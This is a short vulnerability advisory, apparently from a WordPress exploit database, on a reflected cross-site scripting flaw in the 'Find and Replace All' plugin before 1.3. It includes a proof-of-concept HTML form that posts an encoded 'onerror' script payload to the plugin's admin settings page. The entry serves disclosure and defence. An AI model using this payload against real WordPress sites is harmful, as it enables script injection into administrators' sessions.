Lucene search

K
wpexploitVinay Varma MudunuriWPEX-ID:287A14DC-D1FC-481D-84AF-7EB172DC68C9
HistoryNov 03, 2022 - 12:00 a.m.

Find and Replace All < 1.3 - Reflected Cross Site Scripting

2022-11-0300:00:00
Vinay Varma Mudunuri
59
cross site scripting
reflected
find and replace
form
vulnerable site

0.001 Low

EPSS

Percentile

40.3%

The plugin does not sanitize and escape some parameters from its setting page before outputting them back to the user, leading to a Reflected Cross-Site Scripting issue.

<html>
<body>
<form action="http://vulnerable-site.tld/wp-admin/admin.php?page=frasettings" method="POST">
<input type="hidden" name="findstr" value="Doing&#32;XSS&#32;Test&#32;here" />
<input type="hidden" name="replacestr" value="tested&quot;&#47;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert(document.domain);//">
<input type="hidden" name="submit" value="Replace&#32;Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

0.001 Low

EPSS

Percentile

40.3%

Related for WPEX-ID:287A14DC-D1FC-481D-84AF-7EB172DC68C9